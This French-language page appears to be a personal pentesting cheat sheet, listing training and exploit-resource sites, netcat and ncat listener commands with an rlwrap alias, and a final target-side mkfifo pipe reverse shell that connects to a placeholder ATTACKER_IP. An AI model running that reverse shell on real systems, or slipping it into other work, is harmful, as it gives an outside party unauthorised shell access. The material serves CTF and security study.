Boîte à outils

Sommaire

1. Site web

  1. TryHackMe : Formations et exercices de cybersécurité
  2. HackTheBox : Formations et exercices de cybersécurité (aspect compétitif)
  3. GTFOBins : Techniques d’élévation de privilèges en exploitant les failles des binaires Linux
  4. LOLBAS : Equivalent de GTFOBins pour Windows
  5. PayloadsAllTheThings : Recueil de nombreuses charges permettant d’exploiter des vulnérabilités
  6. ExploitDB : Base recensant des vulnérabilités et les moyens de les exploiter
  7. CyberChef : Manipulation de données, chiffrement, déchiffrement

2. Commandes

2.1 Côté machine d’attaque

2.1.1 Mise en écoute

2.1.1.1 Plus simple, préinstallé : Netcat
netcat -lvnp 9000
# ou
nc -lvnp 9000
  • -l : mode écoute (listen)
  • -n : pas de résolution DNS
  • -v : mode verbeux
  • -p : pour spécifier le port
2.1.1.2 Netcat amélioré : Ncat

Développé et distribué par l’équipe en charge de l’outil Nmap, ncat intègre notamment le SSL pour interagir avec des shells chiffrés.

ncat -lvnp 9000
2.1.1.3 Activer l’historique de commandes

Par défaut, Netcat, quelque soit la version citée plus haut, ne permet pas d’utiliser les commandes précédentes avec la flèche du haut, contrairement au shell Linux de base.

rlwrap nc -lvnp 9000

Pour ma part, j’ai créé un alias pour utiliser rapidement la mise en écoute la plus complète possible :

alias nc='rlwrap ncat'

2.2 Côté cible

2.2.1 Pipe reverse shell

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f